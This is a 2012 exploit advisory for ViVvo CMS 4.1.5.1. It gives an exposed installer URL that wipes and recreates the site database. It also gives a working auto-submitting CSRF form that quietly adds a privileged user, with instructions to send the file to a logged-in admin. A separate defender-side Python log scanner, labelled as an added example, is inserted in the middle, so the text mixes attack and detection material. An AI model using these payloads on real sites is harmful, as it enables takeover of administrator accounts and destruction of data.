
ViVvo CMS v4.1.5.1 Multi Vuln

Author: DamaneDz, Published: 23-09-2012
+-----------------------------------------------------------+
# Exploit Title : ViVvo CMS v4.1.5.1 Multi Vuln
# Date : 23-09-2012
# Author : Damane-Dz
# Email : Damane-Dz@hotmail.com
# WebSite : WwW.Exploit4Arab.CoM
# Product Download : http://www.sendspace.com/file/afwbsx
# Version : 4.1.5.1 (not tested on older or newer versions :p)
# Category : WebApps
# Tested on : Win XP SP3
+-----------------------------------------------------------+

./START

1) Install Wizard:

The install wizard, reachable at the URL below, removes any old databases and creates a clean new database.

P.S.: This one works on all versions ^_^

http://www.site.com/installer/index.php

2) CSRF:

<form method="POST" action="http://www.site.com/vivvotest/admin/user_edit.php" name="damane">
<input type="hidden" name="href" value="http://www.site.com/vivvotest/admin/users.php"/>
<input type="hidden" name="SECURITY_TOKEN" value="Token Value"/>
<input type="hidden" name="action" value="user"/>
<input type="hidden" name="cmd" value="add"/>
<input type="hidden" name="USER_activated" value="1"/>
<input type="hidden" name="USER_groups[]" value="2"/>
<input type="hidden" name="USER_first_name" value="abdou"/>
<input type="hidden" name="USER_last_name" value="Damane"/>
<input type="hidden" name="USER_username" value="Damane-Dz"/>
<input type="hidden" name="USER_password" value="algerie"/>
<input type="hidden" name="USER_retype_password" value="algerie"/>
<input type="hidden" name="USER_email_address" value="Damane-Dz@hotmail.com"/>
<input type="hidden" name="USER_picture" value=""/>
<input type="hidden" name="USER_bio" value="Love CodinG ^_^"/>
<input type="hidden" name="USER_www" value="www.exploit4arab.com"/>
</form><script>damane.submit();</script>

How to use the CSRF one?

First change the form values to the right information, such as the victim's website.

You then need to send the HTML file to the victim, who must be logged in to the admin panel.
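
A defender-side check for both issues above, as an added example that is not part of the original advisory: it scans web-server access logs for requests that reached the installer path and for POSTs to admin/user_edit.php whose Referer is missing or points to another host. The combined log format, the function name `scan`, the host `other.example` and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Combined log format: ip - user [time] "METHOD path proto" status size "referer" "agent"
LINE_RE = re.compile(
    r'^\S+ \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "[^"]*"$'
)

def scan(lines, site_host):
    """Return (line_no, reason) findings for the two issues in the advisory."""
    findings = []
    for no, line in enumerate(lines, 1):
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # not in combined log format
        path = urlparse(m["path"]).path.lower()
        # Issue 1: the install wizard answered without an error status.
        if "installer" in path.split("/") and int(m["status"]) < 400:
            findings.append((no, "installer reachable"))
        # Issue 2: user-edit POST whose Referer is absent or from another host.
        if m["method"] == "POST" and path.endswith("/admin/user_edit.php"):
            ref_host = urlparse(m["referer"]).hostname  # None for "-" or ""
            if ref_host != site_host.lower():
                findings.append((no, "foreign or missing Referer on user_edit.php"))
    return findings

# Constructed sample lines (documentation IP ranges, not from a real server).
UA = '"Mozilla/5.0"'
SAMPLE = [
    '198.51.100.7 - - [23/Sep/2012:10:01:02 +0000] "GET /installer/index.php HTTP/1.1" 200 5120 "-" ' + UA,
    '203.0.113.9 - - [23/Sep/2012:10:05:40 +0000] "POST /vivvotest/admin/user_edit.php HTTP/1.1" 200 812 '
    '"http://www.site.com/vivvotest/admin/users.php" ' + UA,
    '203.0.113.9 - - [23/Sep/2012:10:09:13 +0000] "POST /vivvotest/admin/user_edit.php HTTP/1.1" 302 0 '
    '"http://other.example/page.html" ' + UA,
    '198.51.100.7 - - [23/Sep/2012:10:12:00 +0000] "GET /installer/index.php HTTP/1.1" 404 210 "-" ' + UA,
]

if __name__ == "__main__":
    for no, reason in scan(SAMPLE, "www.site.com"):
        print(f"line {no}: {reason}")
```

A hit on the first rule means the installer directory should be removed or blocked on that host. The second rule is a heuristic, since some clients omit the Referer header on legitimate requests.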

./D0N3

-----------Special GreatZ And Thanks To: ---------------------------------------------------------+
Forums: http://www.sec4ever.com/ - http://www.is-sec.org/ - http://www.dz-root.com/ >> MemberZ ^_^
FrienDz: * N4ss!m * DoSs-Dz * Over-X * Klashinkov3 * Ev!lScr!pt-Dz * Ra3Ch * Apocalypse * Sec4Ever * Kader11000 *
Smail002 * Jago-Dz * B07 M4S73R * Hacker-1420 * L3b-R'1z * b0x * Th3 K!LLER Dz * Gastro-Dz
The Viper * And All Dz-Hackers(Algeria)
--------------------------------------------------------------------------------------------------+
